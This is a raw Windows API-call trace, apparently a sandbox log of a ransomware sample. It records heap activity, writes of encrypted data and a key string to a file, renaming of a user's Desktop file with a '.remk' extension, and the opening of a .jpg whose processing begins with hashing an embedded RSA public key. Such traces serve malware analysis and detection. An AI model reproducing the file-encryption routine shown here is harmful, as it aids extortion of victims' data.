dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eded8 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede90 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ede78 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.441] GetCurrentThreadId () returned 0x314 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697918 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.441] GetCurrentThreadId () returned 0x314 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eded8 [0231.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edef0 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edec0 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edf08 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edea8 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf08 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edef0 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c15a8 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.446] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x11e21, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x11e21, lpOverlapped=0x0) returned 1 [0231.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0231.446] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11e26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.446] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.447] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.447] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.447] CloseHandle (hObject=0x640) returned 1 [0231.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0231.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0231.449] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O50 BhA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o50 bha.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O50 BhA.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o50 bha.wav.remk")) returned 1 [0231.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.450] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.451] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd83470b0, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x65a921d0, ftLastAccessTime.dwHighDateTime=0x1d5e2c7, ftLastWriteTime.dwLowDateTime=0x65a921d0, ftLastWriteTime.dwHighDateTime=0x1d5e2c7, nFileSizeHigh=0x0, nFileSizeLow=0xb8bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p6ekR 2Fq3NJCopO9.jpg", cAlternateFileName="P6EKR2~1.JPG")) returned 1 [0231.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.452] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6ekR 2Fq3NJCopO9.jpg") returned=".jpg" [0231.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6ekR 2Fq3NJCopO9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6ekr 2fq3njcopo9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.452] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=47292) returned 1 [0231.452] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.455] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb896, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.455] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.456] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.456] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xb8bc, lpOverlapped=0x0) returned 1 [0231.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.456] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.457] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.457] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.457] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.457] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.457] GetLastError () returned 0x0 [0231.458] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.458] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.458] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.458] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.458] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb8c0) returned 0x37c2278 [0231.458] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.459] 